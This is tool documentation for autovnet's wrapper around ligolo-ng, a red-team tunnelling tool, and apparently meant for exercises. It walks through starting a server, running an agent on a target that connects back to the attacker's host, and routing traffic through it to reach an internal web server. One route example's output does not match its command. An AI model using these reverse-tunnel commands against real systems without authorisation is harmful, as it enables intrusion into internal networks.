# ligolo-ng

[TOC]

## ligolo-ng

[ligolo-ng](https://github.com/nicocha30/ligolo-ng) is a simple, lightweight and fast tool that allows pentesters to establish tunnels from a reverse TCP/TLS connection using a tun interface (without the need of SOCKS).

## Concepts

* `ligolo-ng server / proxy` runs on your local (e.g. Kali) system, and listens for connections
    - You (the Red Teamer) type commands into the `server` after it starts
* `ligolo-ng agent` runs on the target system, and will connect (through `autovnet magic`) back to your `ligolo-ng server / proxy`
* While your server is running, you get a `tun` named `lgng-XXXX`
    - You can see this `tun` in `ip link show`
    - Don't mess with it manually unless you know what you are doing
    - See workflow for how this works

## ligolo-ng + autovnet

`autovnet`'s [powerful networking features](../rdn/README.md) works with the `ligolo-ng` server transparently.

On the wire, the `agent` will connect to an `autovnet` `listen`er.
`autovnet` will then deliver those packets over a convoy of carrier pigeons to the `ligolo-ng server` ... or something.

(The connection will eventually get to the `ligolo-ng server`, and everything will Just Work).

### Workflow

The basic workflow is

* `autovnet rtfm ligolo-ng server`
    - Creates a server, generates a codename
    - You get the `ligolo-ng` (server) prompt, which lets you control `agents` that connect
* Deploy your agent to a target and run it
* Once your agent connects, you get a `session` that you can interact with via the `session` command
* You probably want to run `start` on the session
    - Running `start` makes your `lgng-XXX` `tun` usable
    - Any traffic routed to that `tun` on your local system will be sent by the remote agent into the target's network, neat!
* After you got your `session` and ran `start`, use `autovnet rtfm ligolo_ng route CODENAME X.X.X.X/YY` to add a route through the agent
    - You can add a route for a particular target system, or for the whole target network
    - Use `ip route get X.X.X.X` to see which interface your traffic will go through
    - Note: this is a powerful command. Only add routes that make sense, or you can easily kick yourself off the network :)
* When you stop the `autovnet rtfm ligolo-ng server`, any routes are deleted
    - WARNING: Either delete routes (see `--delete` flag) or stop the server if you do not have an active `agent` that you ran `start` on!
    - Otherwise, your routes will send the traffic to a dead interface, and you won't be able to connect to whatever you were trying to route to **at all**, even it was reachable before you added routes!

### Examples

## Start Server

Starting the `server` is easy.

You can run as many servers as you want.
You'll get a unique codename, `autovnet` listeners, and a `ligolo-ng` `tun` for each, so you can route things however you want.


```bash
autovnet rtfm ligolo_ng server
[+] acrid_box | 100.80.222.219:443 => 127.0.0.1:40363
================================================================================
        _____  ______  _____          _____      __   _  ______
 |        |   |  ____ |     | |      |     | ___ | \  | |  ____
 |_____ __|__ |_____| |_____| |_____ |_____|     |  \_| |_____|

================================================================================
[+] autovnet rtfm ligolo_ng acrid_box
[+] target: agent -ignore-cert -retry -connect 100.80.222.219:443
[+] route: autovnet rtfm ligolo_ng route acrid_box X.X.X.X/YY
================================================================================
[+] agents: /opt/rtfm/ligolo-ng/acrid_box/bin
[+] tun: lgng-b7fb040ff0 / lgng-acrid-box
================================================================================
1. Start the server (this command)
2. Run the agent on a target > get the session > `session` (pick session) > `start`
3. Route through agent (other terminal): autovnet rtfm ligolo_ng route X.X.X.X/YY
================================================================================
...
ligolo-ng » 

```

`autovnet` prints some example commands for restarting this server in the future, how to run an agent, and how to add routes,
as well as where you can find the `agent` binaries, and the name of the `tun` device that was created

## Deploy + Run Agent

Left as an exercise for the reader, but don't skip this step :)

## Get Session

Here's what getting a session looks like:
```bash
ligolo-ng » INFO[0225] Agent joined.                                 name=foo@bar remote="127.0.0.1:36582"
ligolo-ng » 
```

Interact with it:
```bash
ligolo-ng » session
? Specify a session : 1 - foo@bar - 127.0.0.1:36582
```

Run `start`, so we can start pivoting through the agent
```bash
[Agent : foo@bar] » start
[Agent : foo@bar] » INFO[0241] Starting tunnel to foo@bar               
```

## Add Routes

**ONLY ADD ROUTES IF YOU HAVE AN ACTIVE AGENT YOU RAN `start` ON**

**WARNING: Only add routes that make sense!**

If you break your connection to a game VPN, your local gateway, or the autovnet server, you are going to have a very bad time.
Ask an adult if you need help determining if the routes you are about to add are good or not.
Kill your autovnet rtfm ligolo-ng server command to remove bad routes.
You may need to restart any `autovnet` listeners, if you actually dropped the connection to the `autovnet` server

Assume the target network is `192.168.100.0/24`, and we want to pivot internally through the agent
to access `192.168.100.5`, a currently unaccessible web server.

> Note: the syntax for the routes is the same as the `ip route add` command. No host bits can be set.
> You can route to a single IP with X.X.X.X or X.X.X.X/32

In a new terminal:

```bash
$ autovnet rtfm ligolo_ng route acrid_box 192.168.100.0/24
[+] add route: 192.168.17.0/24 via dev lgng-b7fb040ff0 (lgng-acrid-box)
[+] delete routes: autovnet rtfm ligolo_ng route -d acrid_box 192.168.17.0/24
```

`autovnet` tells us that is added the route, and how we can delete it, if we would like to.

> Note: Add routes are deleted when you stop the `autovnet rtfm ligolo-ng server`, because the `tun` itself is deleted


We can confirm that traffic we send to `192.168.100.5` will route through our `lgng-XXX` tun (and therefore the `ligolo-ng` agent)
```bash
$ ip route get 192.168.100.5
192.168.100.5 dev lgng-b7fb040ff0 src X.X.X.X uid 1000 
    cache
```

Now, this `curl` routes through our agent and can reach the previously unreachable internal web server.

From the web server's perspective, the request came from whatever system we deployed the `ligolo-ng` agent on.
```bash
$ curl http://192.168.100.5
...
```
